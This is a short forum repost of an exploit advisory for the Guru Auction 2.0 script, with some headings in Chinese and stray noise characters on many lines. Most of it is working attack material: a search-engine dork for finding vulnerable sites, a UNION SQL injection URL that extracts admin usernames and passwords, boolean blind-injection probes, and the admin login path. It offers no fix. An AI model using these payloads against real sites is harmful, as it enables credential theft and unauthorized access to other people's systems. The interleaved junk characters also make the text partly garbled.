Guru Auction 2.0 Multiple SQL Injection Vulnerabilities6 b: ^+ J( k' { l& A7 ?2 Z
% H& e* N3 a( i. L _- y作者 : v3n0m
$ ^: B% z1 g; i1 x% c应用 : Guru Auction 2.03 L" m4 e7 \7 w+ A3 J( E" V
Price : $49
' s, c0 c, ?! m) e2 W+ F/ _+ M; eVendor : http://www.guruscript.com// U* M& e S, F* d1 l+ H p. y
Google Dork : inurl:subcat.php?cate_id=! b6 Q, I, e$ L, r; n& m
" ?/ u, `7 u+ XSQLi p0c:
% B2 s/ V% J% f; C~~~~~~~~~~5 N. T6 X }1 J; i* S3 S
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
4 |( p: {2 L9 L N: M
# {* S" O7 Z1 e0 I- N2 A
9 w) z) |; [& i" q盲注 p0c:
% U* T. \9 B& k1 A, j1 t~~~~~~~~~~
1 }6 y) S5 B! l$ phttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
/ j7 V. [, L; M+ `" d: f* Lhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
, F% Q+ F. |' I- g% B - n6 t! r0 T9 x8 u6 j
管理登录入口:( K7 e% q2 Z% K& f
~~~~~~~~~~! ?- c% Z1 f% [
http://domain.tld/[path]/admin/
! s- i6 q% C2 Z- u3 _' y4 l6 J |
发表于 2012-12-31 09:24:05
收藏
支持
反对